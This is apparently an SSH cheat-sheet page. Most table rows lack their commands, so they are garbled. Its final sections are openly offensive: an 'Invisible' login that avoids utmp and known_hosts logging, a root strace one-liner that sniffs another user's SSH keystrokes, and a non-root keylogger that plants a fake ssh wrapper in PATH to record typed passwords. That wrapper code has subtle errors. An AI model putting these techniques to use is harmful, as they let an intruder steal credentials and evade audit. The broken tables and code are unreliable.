SSH#
SSH is the operator’s primary remote shell, file copy, port-forward, and tunnel utility. This page covers core invocations, advanced key and config flags, tunneling, security hardening, and log triage.
Basic#
Command |
Effect |
|---|---|
|
SSH without input password. |
|
Install sshd server. |
|
Restart sshd server. |
|
Run SSH command. |
|
SSH with verbose output. |
|
Set up SSH tunnel for web browsing. |
|
SSH passwordless login. |
|
Remove entry from |
|
Diff local file with remote. |
|
Diff two remote SSH files. |
|
Upload preserving timestamps and permissions. |
|
SSH agent load key. |
|
List all loaded keys. |
|
Create and load key. |
|
Emacs read remote file with tramp. |
|
Generate a new key pair. |
|
Generate key pair without interaction. |
Advanced#
Command |
Effect |
|---|---|
|
Add passphrase protection to an SSH keyfile. |
|
Configure SSH to avoid trying all identity files. |
|
Convert OpenSSL to SSH-RSA format. |
|
Critical SSH files. |
|
SSH config file. |
|
SSH key file permission. |
|
SSH folder permission. |
|
|
|
Mute permanently-added warning. |
Tunnel#
Command |
Effect |
|---|---|
|
SSH port forward to a local port. |
|
No logs in |
|
SSH tunnel OUT. |
|
SSH tunnel IN. |
|
SSH socks4/5 IN, access local network through proxy. |
|
SSH socks4/5 OUT, reverse dynamic forwarding. |
|
Reverse port forward to remote server. |
|
Set up SSH tunnel for web browsing. |
Hardening#
Command |
Effect |
|---|---|
|
Disable SSH by password. |
|
Disable root login. |
|
Enable / disable SSH host key checking. |
|
Protect SSH server from brute force. |
SCP#
Command |
Effect |
|---|---|
|
Download a remote folder. |
|
Upload a file. |
|
Upload a folder. |
|
Upload with timestamps and permissions. |
|
Mount remote directory as local folder. |
Logs#
Command |
Effect |
|---|---|
|
Events of SSH down. |
|
Events of SSH up. |
|
Events of SSH failed login. |
|
Events of SSH break-in attempt. |
|
Events of SSH port scan. |
|
Events of SSH login by public key. |
|
Events of SSH login by password. |
|
Events of SSH logout. |
Tools#
Tool |
Purpose |
|---|---|
|
Export local environment to the internet. |
|
Reverse SSH proxy. |
|
SSH by auto-input password. |
Invisible#
Add yourself with no audit trail.
# ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"
This avoids adding your user to /var/log/utmp (you won’t show in
w or who), avoids .profile and .bash_profile, and
stops logging the host name to ~/.ssh/known_hosts.
VPN#
Tunnel layer-3 network traffic via an SSH channel. Need root on
both sides. sshd_config (server side).
PermitRootLogin yes
PermitTunnel yes
Create a pair of tun devices on client and server.
$ ssh username@server -w any:any
Configure client and server interfaces.
# client
$ ip addr add 1.1.1.2/32 peer 1.1.1.1 dev tun0
# server
$ ip addr add 1.1.1.1/32 peer 1.1.1.2 dev tun0
Enable IP forwarding and NAT on the server.
$ echo 1 > /proc/sys/net/ipv4/ip_forward
$ iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
Make the peer your default gateway or route a specific host / network through it.
$ route add -net 10.0.0.0/16 gw 1.1.1.1
Server’s external interface is eth0; newly created tun devices
on both sides are tun0.
Sniff#
Sniff a user’s SSH session (root).
$ strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
Non-root sniff (when /proc/sys/kernel/yama/ptrace_scope is 1).
Wrap ssh to log to ~/.ssh/logs/.
# Add a local path to PATH
$ echo '$PATH=~/.local/bin:$PATH' >>~/.profile
$ mkdir -p ~/.local/bin ~/.ssh/logs
$ cat >~/.local/bin/ssh
#! /bin/bash
strace -e trace=read -o '! ~/.local/bin/ssh-log $$' /usr/bin/ssh $@
$ cat ~/.local/bin/ssh-log
#! /bin/bash
grep 'read(4' | cut -f2 -d\" | while read -r x; do
if [ ${#x} -ne 2 ] && [ ${#x} -ne 1 ]; then continue; fi
if [ x"${x}" == "x\n" ] || [ x"${x}" == "x\r" ]; then
echo ""
else
echo -n "${x}"
fi
done >~/.ssh/.logs/ssh-log-"${1}"-`date +%s`.txt
$ chmod 755 ~/.local/bin/ssh ~/.local/bin/ssh-log